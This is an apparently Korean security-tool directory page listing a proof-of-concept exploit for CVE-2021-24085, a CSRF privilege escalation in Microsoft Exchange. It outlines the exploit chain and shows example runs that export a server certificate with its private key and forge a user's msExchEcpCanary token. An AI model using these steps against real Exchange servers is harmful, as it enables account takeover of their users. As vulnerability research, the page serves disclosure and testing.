Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2021-24085 — CVE-2021-24085에 대한 개념 증명 익스플로잇: msExchEcpCanary 토큰 위조를 통한 Microsoft Exchange Server의 CSRF 기반 권한 상승으로 계정 탈취 가능 | Kitploit
도구/GitHubGitHub/sourceincite/cve-2021-24085
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsourceincite/cve-2021-24085

CVE-2021-24085

CVE-2021-24085에 대한 개념 증명 익스플로잇: msExchEcpCanary 토큰 위조를 통한 Microsoft Exchange Server의 CSRF 기반 권한 상승으로 계정 탈취 가능

저장소 보기
71185년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Microsoft Exchange Server msExchEcpCanary 교차 사이트 요청 위조 권한 상승 취약점

이것은 CVE-2021-24085에 대한 개념 증명입니다.

  1. poc.py는 대상의 인증서 파일을 내부에 개인 키와 함께 다운로드합니다.
  2. YellowCanary는 SID를 기반으로 특정 사용자의 msExchEcpCanary CSRF 토큰을 생성합니다.
  3. poc.js는 계정 탈취를 유발하는 CSRF 익스플로잇입니다.

malicifest.xml 파일을 제공하지는 않았지만, 아래 참고 자료 섹션에서 사용 가능한 리소스를 통해 악성 매니페스트 파일을 생성하는 방법에 대한 정보를 찾을 수 있습니다.

예제

개인 키가 포함된 인증서에 접근:

root@kitploit:~
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###

researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax

이제 대상 사용자의 SID를 사용하여 YellowCanary로 CSRF 토큰을 생성할 수 있습니다:

root@kitploit:~
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax

            #====================================================
            # YellowCanary - generate msExchEcpCanary csrf tokens
            #====================================================

security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary     : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.

참고 자료:

  • https://www.mdsec.co.uk/2019/01/abusing-office-web-add-ins-for-fun-and-limited-profit/
  • https://info.phishlabs.com/blog/office-365-phishing-uses-malicious-app-persist-password-reset
도구 다운로드